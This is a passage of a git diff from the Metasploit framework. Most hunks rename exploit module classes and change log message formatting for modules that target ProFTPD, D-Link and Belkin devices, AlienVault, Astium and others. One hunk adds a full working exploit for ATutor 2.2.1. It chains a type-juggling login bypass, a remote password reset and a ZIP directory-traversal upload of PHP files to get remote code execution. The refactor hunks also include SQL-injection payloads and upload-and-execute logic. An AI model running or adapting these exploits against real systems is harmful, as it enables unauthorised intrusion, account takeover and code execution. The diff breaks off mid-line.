print_status("Executing the payload...") exec_command(command, 1) end diff --git a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb index 5e2674723a..a783d4ed8f 100644 --- a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb +++ b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb index b5c8c3d0e8..33b1920d30 100644 --- a/modules/exploits/linux/ftp/proftp_sreplace.rb +++ b/modules/exploits/linux/ftp/proftp_sreplace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb index 5891da9e62..fb7f6cf438 100644 --- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking #include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index 569747d8a1..caa3c9a700 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb index 6640a05340..45587d7b30 100644 --- a/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb +++ b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb index 54a1b3bd45..609ad4d5e2 100644 --- a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb +++ b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -68,19 +68,19 @@ class Metasploit4 < Msf::Exploit::Remote 'uri' => '/cgi-bin/ping.sh' ) if !res - vprint_error("#{peer} - No response from host") + vprint_error("No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /Boa\/(.*)/ - vprint_status("#{peer} - Found Boa version #{$1}") + vprint_status("Found Boa version #{$1}") else - print_status("#{peer} - Target is not a Boa web server") + print_status("Target is not a Boa web server") return Exploit::CheckCode::Safe end if res.body.to_s.index('127.0.0.1 ping statistics') return Exploit::CheckCode::Detected else - vprint_error("#{peer} - Target does not appear to be an Advantech switch") + vprint_error("Target does not appear to be an Advantech switch") return Expoit::CheckCode::Safe end end @@ -90,7 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote # def exploit cmd = cve_2014_6271(payload.encoded) - vprint_status("#{peer} - Trying to run command '#{cmd}'") + vprint_status("Trying to run command '#{cmd}'") res = send_request_cgi( 'method' => 'GET', 'uri' => '/cgi-bin/ping.sh', diff --git a/modules/exploits/linux/http/airties_login_cgi_bof.rb b/modules/exploits/linux/http/airties_login_cgi_bof.rb index 42232de7a8..d8f1c3b530 100644 --- a/modules/exploits/linux/http/airties_login_cgi_bof.rb +++ b/modules/exploits/linux/http/airties_login_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 100 diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index e3a9832d88..19557b6ae7 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Only interactive single commands supported include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 343ff95190..caafb37989 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) " sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}" - print_status("#{peer} - Trying to grab admin session through SQLi") + print_status("Trying to grab admin session through SQLi") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/ admin_session = $1 @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*") - print_status("#{peer} - Admin session cookie is [ #{@cookie} ]") + print_status("Admin session cookie is [ #{@cookie} ]") else fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session") end @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Created Action [ #{action} ]") + print_status("Created Action [ #{action} ]") else fail_with(Failure::Unknown, "#{peer} - Action creation failed!") end @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/ @action_id = $1 - print_status("#{peer} - Action ID is [ #{@action_id} ]") + print_status("Action ID is [ #{@action_id} ]") else fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!") end @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/ policy_ctx = $1 policy_group = $2 - print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") + print_status("Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!") end @@ -216,7 +216,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Created Policy [ #{policy} ]") + print_status("Created Policy [ #{policy} ]") else fail_with(Failure::Unknown, "#{peer} - Policy creation failed!") end @@ -237,13 +237,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/ @policy_id = $1 - print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!") + print_status("Policy ID [ #{@policy_id} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!") end # Reload the policies to make our new policy active - print_status("#{peer} - Reloading Policies") + print_status("Reloading Policies") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), @@ -255,14 +255,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policies reloaded!") + print_status("Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") end # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. dont_exist = rand_text_alpha(8+rand(4)) - print_status("#{peer} - Triggering policy and action by requesting a non existing url") + print_status("Triggering policy and action by requesting a non existing url") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, dont_exist), @@ -270,7 +270,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 404 - print_status("#{peer} - Payload delivered") + print_status("Payload delivered") else fail_with(Failure::Unknown, "#{peer} - Payload failed!") end @@ -281,7 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup begin # Clean up, retrieve token so that the policy can be removed - print_status("#{peer} - Cleaning up") + print_status("Cleaning up") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), @@ -291,9 +291,9 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") + print_status("Token [ #{token} ] retrieved") else - print_warning("#{peer} - Unable to retrieve token") + print_warning("Unable to retrieve token") end # Remove our policy @@ -309,9 +309,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policy ID [ #{@policy_id} ] removed") + print_status("Policy ID [ #{@policy_id} ] removed") else - print_warning("#{peer} - Unable to remove Policy ID") + print_warning("Unable to remove Policy ID") end # Remove our action @@ -325,13 +325,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Action ID [ #{@action_id} ] removed") + print_status("Action ID [ #{@action_id} ] removed") else - print_warning("#{peer} - Unable to remove Action ID") + print_warning("Unable to remove Action ID") end # Reload the policies to revert back to the state before exploitation - print_status("#{peer} - Reloading Policies") + print_status("Reloading Policies") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), @@ -343,7 +343,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policies reloaded!") + print_status("Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") end diff --git a/modules/exploits/linux/http/astium_sqli_upload.rb b/modules/exploits/linux/http/astium_sqli_upload.rb index a721d59af2..5199a63285 100644 --- a/modules/exploits/linux/http/astium_sqli_upload.rb +++ b/modules/exploits/linux/http/astium_sqli_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Configuration is overwritten and service reloaded include Msf::Exploit::Remote::HttpClient @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect Astium") + vprint_status("Trying to detect Astium") res = send_request_cgi({ 'method' => 'GET', @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri), @@ -82,16 +82,16 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 302 and res.get_cookies =~ /astiumnls=([a-zA-Z0-9]+)/ session = $1 - print_good("#{peer} - Session cookie is [ #{session} ]") + print_good("Session cookie is [ #{session} ]") redirect = URI(res.headers['Location']) - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => "#{redirect}", 'method' => 'GET', @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote pass = rand_text_alphanumeric(10) post_data = "__act=submit&user_name=#{sqli}&pass_word=#{pass}&submit=Login" - print_status("#{peer} - Using SQLi to bypass authentication") + print_status("Using SQLi to bypass authentication") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "/en", "logon.php"), @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(phppayload, "application/octet-stream", nil, "file; name=\"importcompany\"; filename=\"#{payload_name}\"") file = post_data.to_s - print_status("#{peer} - Uploading Payload [ #{payload_name} ]") + print_status("Uploading Payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "en", "database", "import.php"), @@ -168,8 +168,8 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup("/usr/local/astium/web/html/upload/#{payload_name}") - print_status("#{peer} - Requesting Payload [ #{uri}upload/#{payload_name} ]") - print_status("#{peer} - Waiting as the reloading process may take some time, this may take a couple of minutes") + print_status("Requesting Payload [ #{uri}upload/#{payload_name} ]") + print_status("Waiting as the reloading process may take some time, this may take a couple of minutes") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "upload", "#{payload_name}") @@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response...") + print_error("Unexpected response...") end end diff --git a/modules/exploits/linux/http/atutor_filemanager_traversal.rb b/modules/exploits/linux/http/atutor_filemanager_traversal.rb new file mode 100644 index 0000000000..ef74506ef1 --- /dev/null +++ b/modules/exploits/linux/http/atutor_filemanager_traversal.rb @@ -0,0 +1,360 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'ATutor 2.2.1 Directory Traversal / Remote Code Execution', + 'Description' => %q{ + This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP + setup with display_errors set to On, which can be used to allow us to upload a malicious + ZIP file. On the web application, a blacklist verification is performed before extraction, + however it is not sufficient to prevent exploitation. + + You are required to login to the target to reach the vulnerability, however this can be + done as a student account and remote registration is enabled by default. + + Just in case remote registration isn't enabled, this module uses 2 vulnerabilities + in order to bypass the authentication: + + 1. confirm.php Authentication Bypass Type Juggling vulnerability + 2. password_reminder.php Remote Password Reset TOCTOU vulnerability + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'mr_me ', # initial discovery, msf code + ], + 'References' => + [ + [ 'URL', 'http://www.atutor.ca/' ], # Official Website + [ 'URL', 'http://sourceincite.com/research/src-2016-09/' ], # Type Juggling Advisory + [ 'URL', 'http://sourceincite.com/research/src-2016-10/' ], # TOCTOU Advisory + [ 'URL', 'http://sourceincite.com/research/src-2016-11/' ], # Directory Traversal Advisory + [ 'URL', 'https://github.com/atutor/ATutor/pull/107' ] + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Mar 1 2016', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']), + OptString.new('USERNAME', [false, 'The username to authenticate as']), + OptString.new('PASSWORD', [false, 'The password to authenticate with']) + ],self.class) + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_error(msg='') + super("#{peer} - #{msg}") + end + + def print_good(msg='') + super("#{peer} - #{msg}") + end + + def check + # there is no real way to finger print the target so we just + # check if we can upload a zip and extract it into the web root... + # obviously not ideal, but if anyone knows better, feel free to change + if (not datastore['USERNAME'].blank? and not datastore['PASSWORD'].blank?) + student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], check=true) + if student_cookie != nil && disclose_web_root + begin + if upload_shell(student_cookie, check=true) && found + return Exploit::CheckCode::Vulnerable + end + rescue Msf::Exploit::Failed => e + vprint_error(e.message) + end + else + # if we cant login, it may still be vuln + return Exploit::CheckCode::Unknown + end + else + # if no creds are supplied, it may still be vuln + return Exploit::CheckCode::Unknown + end + return Exploit::CheckCode::Safe + end + + def create_zip_file(check=false) + zip_file = Rex::Zip::Archive.new + @header = Rex::Text.rand_text_alpha_upper(4) + @payload_name = Rex::Text.rand_text_alpha_lower(4) + @archive_name = Rex::Text.rand_text_alpha_lower(3) + @test_string = Rex::Text.rand_text_alpha_lower(8) + # we traverse back into the webroot mods/ directory (since it will be writable) + path = "../../../../../../../../../../../../..#{@webroot}mods/" + + # we use this to give us the best chance of success. If a webserver has htaccess override enabled + # we will win. If not, we may still win because these file extensions are often registered as php + # with the webserver, thus allowing us remote code execution. + if check + zip_file.add_file("#{path}#{@payload_name}.txt", "#{@test_string}") + else + register_file_for_cleanup( ".htaccess", "#{@payload_name}.pht", "#{@payload_name}.php4", "#{@payload_name}.phtml") + zip_file.add_file("#{path}.htaccess", "AddType application/x-httpd-php .phtml .php4 .pht") + zip_file.add_file("#{path}#{@payload_name}.pht", "") + zip_file.add_file("#{path}#{@payload_name}.php4", "") + zip_file.add_file("#{path}#{@payload_name}.phtml", "") + end + zip_file.pack + end + + def found + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.txt"), + }) + if res and res.code == 200 and res.body =~ /#{@test_string}/ + return true + end + return false + end + + def disclose_web_root + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "jscripts", "ATutor_js.php"), + }) + @webroot = "/" + @webroot << $1 if res and res.body =~ /\\/(.*)jscripts\/ATutor_js\.php\<\/b\> / + if @webroot != "/" + return true + end + return false + end + + def call_php(ext) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.#{ext}"), + 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" + }, timeout=0.1) + return res + end + + def exec_code + res = nil + res = call_php("pht") + if res == nil + res = call_php("phtml") + end + if res == nil + res = call_php("php4") + end + end + + def upload_shell(cookie, check) + post_data = Rex::MIME::Message.new + post_data.add_part(create_zip_file(check), 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{@archive_name}.zip\"") + post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"submit_import\"") + data = post_data.to_s + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "mods", "_standard", "tests", "question_import.php"), + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'cookie' => cookie, + 'vars_get' => { + 'h' => '' + } + }) + if res && res.code == 302 && res.redirection.to_s.include?("question_db.php") + return true + end + # unknown failure... + fail_with(Failure::Unknown, "Unable to upload php code") + return false + end + + def find_user(cookie) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "users", "profile.php"), + 'cookie' => cookie, + # we need to set the agent to the same value that was in type_juggle, + # since the bypassed session is linked to the user-agent. We can then + # use that session to leak the username + 'agent' => '' + }) + username = "#{$1}" if res and res.body =~ /(.*)<\/span>/ + if username + return username + end + # else we fail, because we dont know the username to login as + fail_with(Failure::Unknown, "Unable to find the username!") + end + + def type_juggle + # high padding, means higher success rate + # also, we use numbers, so we can count requests :p + for i in 1..8 + for @number in ('0'*i..'9'*i) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "confirm.php"), + 'vars_post' => { + 'auto_login' => '', + 'code' => '0' # type juggling + }, + 'vars_get' => { + 'e' => @number, # the bruteforce + 'id' => '', + 'm' => '', + # the default install script creates a member + # so we know for sure, that it will be 1 + 'member_id' => '1' + }, + # need to set the agent, since we are creating x number of sessions + # and then using that session to get leak the username + 'agent' => '' + }, redirect_depth = 0) # to validate a successful bypass + if res and res.code == 302 + cookie = "ATutorID=#{$3};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/ + return cookie + end + end + end + # if we finish the loop and have no sauce, we cant make pasta + fail_with(Failure::Unknown, "Unable to exploit the type juggle and bypass authentication") + end + + def reset_password + # this is due to line 79 of password_reminder.php + days = (Time.now.to_i/60/60/24) + # make a semi strong password, we have to encourage security now :-> + pass = Rex::Text.rand_text_alpha(32) + hash = Rex::Text.sha1(pass) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "password_reminder.php"), + 'vars_post' => { + 'form_change' => 'true', + # the default install script creates a member + # so we know for sure, that it will be 1 + 'id' => '1', + 'g' => days + 1, # needs to be > the number of days since epoch + 'h' => '', # not even checked! + 'form_password_hidden' => hash, # remotely reset the password + 'submit' => 'Submit' + }, + }, redirect_depth = 0) # to validate a successful bypass + + if res and res.code == 302 + return pass + end + # if we land here, the TOCTOU failed us + fail_with(Failure::Unknown, "Unable to exploit the TOCTOU and reset the password") + end + + def login(username, password, check=false) + hash = Rex::Text.sha1(Rex::Text.sha1(password)) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "login.php"), + 'vars_post' => { + 'form_password_hidden' => hash, + 'form_login' => username, + 'submit' => 'Login', + 'token' => '', + }, + }) + # poor php developer practices + cookie = "ATutorID=#{$4};" if res && res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/ + if res && res.code == 302 + if res.redirection.to_s.include?('bounce.php?course=0') + return cookie + end + end + # auth failed if we land here, bail + unless check + fail_with(Failure::NoAccess, "Authentication failed with username #{username}") + end + return nil + end + + def report_cred(opts) + service_data = { + address: rhost, + port: rport, + service_name: ssl ? 'https' : 'http', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + post_reference_name: self.refname, + private_data: opts[:password], + origin_type: :service, + private_type: :password, + username: opts[:user] + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + last_attempted_at: Time.now + }.merge(service_data) + + create_credential_login(login_data) + end + + def exploit + # login if needed + if (not datastore['USERNAME'].empty? and not datastore['PASSWORD'].empty?) + report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD']) + student_cookie = login(datastore['USERNAME'], datastore['PASSWORD']) + print_good("Logged in as #{datastore['USERNAME']}") + # else, we reset the students password via a type juggle vulnerability + else + print_status("Account details are not set, bypassing authentication...") + print_status("Triggering type juggle attack...") + student_cookie = type_juggle + print_good("Successfully bypassed the authentication in #{@number} requests !") + username = find_user(student_cookie) + print_good("Found the username: #{username} !") + password = reset_password + print_good("Successfully reset the #{username}'s account password to #{password} !") + report_cred(user: username, password: password) + student_cookie = login(username, password) + print_good("Logged in as #{username}") + end + + if disclose_web_root + print_good("Found the webroot") + # we got everything. Now onto pwnage + if upload_shell(student_cookie, false) + print_good("Zip upload successful !") + exec_code + end + end + end +end + +=begin +php.ini settings: +display_errors = On +=end diff --git a/modules/exploits/linux/http/belkin_login_bof.rb b/modules/exploits/linux/http/belkin_login_bof.rb index 2994ce4a32..d530c09c05 100644 --- a/modules/exploits/linux/http/belkin_login_bof.rb +++ b/modules/exploits/linux/http/belkin_login_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -78,13 +78,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200 diff --git a/modules/exploits/linux/http/centreon_sqli_exec.rb b/modules/exploits/linux/http/centreon_sqli_exec.rb index 417e2e6d14..e6c17a5254 100644 --- a/modules/exploits/linux/http/centreon_sqli_exec.rb +++ b/modules/exploits/linux/http/centreon_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited. Possibly because there's nothing in the centreon.session table. Perhaps try again later?") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") random_id = rand_text_numeric(5 + rand(8)) random_char = rand_text_alphanumeric(1) session_injection = "#{random_id}' or '#{random_char}'='#{random_char}" diff --git a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb index 27d546f05b..a63ef51506 100644 --- a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb +++ b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index 0b43b461ad..36fdc4841d 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /DD-WRT/ ] } diff --git a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb index e345dc28a1..7b1cbbb6d3 100644 --- a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -74,13 +74,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, diff --git a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb index accdee0cdb..9e52b2400d 100644 --- a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dcs931l_upload.rb b/modules/exploits/linux/http/dlink_dcs931l_upload.rb index bca4beed87..588b4e8675 100644 --- a/modules/exploits/linux/http/dlink_dcs931l_upload.rb +++ b/modules/exploits/linux/http/dlink_dcs931l_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient @@ -72,15 +72,15 @@ class Metasploit4 < Msf::Exploit::Remote )) unless res - vprint_status("#{peer} - The connection timed out.") + vprint_status("The connection timed out.") return Exploit::CheckCode::Unknown end if res.code && res.code == 404 - vprint_status("#{peer} - uploadfile.htm does not exist") + vprint_status("uploadfile.htm does not exist") return Exploit::CheckCode::Safe elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/ - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Detected elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/ return Exploit::CheckCode::Vulnerable @@ -101,7 +101,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 404 fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist") elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - print_good("#{peer} - Payload uploaded successfully") + print_good("Payload uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload") end @@ -117,7 +117,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 404 fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist") elsif res.code && res.code == 200 && res.body && res.body =~ /File had been 